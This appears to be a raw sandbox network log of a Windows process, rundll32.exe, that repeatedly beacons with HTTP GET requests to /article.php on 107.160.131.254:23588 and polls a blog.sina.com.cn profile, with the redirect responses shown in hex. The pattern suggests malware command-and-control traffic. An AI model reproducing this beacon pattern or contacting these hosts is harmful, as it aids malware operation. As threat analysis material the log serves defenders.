                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.549857107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:49.679462910 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.549859107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:49.928164005 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          9192.168.2.549860116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:49.928282976 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          10192.168.2.549897107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:53.697033882 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          11192.168.2.549899116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:53.818470955 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:33:56.329720974 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:33:56 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.549900107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:53.818614960 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          13192.168.2.549938107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:57.912029982 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          14192.168.2.549943107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:58.177066088 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          15192.168.2.549944116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:33:58.177181959 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          16192.168.2.549980107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:02.044260025 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          17192.168.2.549982107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:02.158725023 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          18192.168.2.549983116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:02.159209013 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:03.882188082 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:03 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          19192.168.2.550026107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:06.062958956 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          20192.168.2.550028107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:06.170423985 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          21192.168.2.550029116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:06.185621977 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:07.900721073 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:07 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          22192.168.2.550072107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:10.077888966 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          23192.168.2.550073116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:10.211318970 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:11.998063087 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:11 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          24192.168.2.550074107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:10.224524975 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          25192.168.2.550121107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:14.206903934 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          26192.168.2.550123107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:14.320843935 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          27192.168.2.550124116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:14.329119921 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:16.124452114 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:15 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          28192.168.2.550166107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:18.218353033 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          29192.168.2.550168107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:18.348444939 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          30192.168.2.550169116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:18.348536015 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:20.060470104 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:19 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          31192.168.2.550208107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:22.340991974 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          32192.168.2.550210107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:22.453018904 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          33192.168.2.550211116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:22.470470905 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          34192.168.2.550256107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:26.361413002 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          35192.168.2.550260107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:26.470549107 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          36192.168.2.550261116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:26.470716953 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:28.300256968 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:28 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          37192.168.2.550308107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:30.385987997 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          38192.168.2.550311107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:30.507567883 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          39192.168.2.550312116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:30.517781973 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:30.875124931 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:34:32.273067951 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:34:32 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          40192.168.2.550371107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:34:34.511729002 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
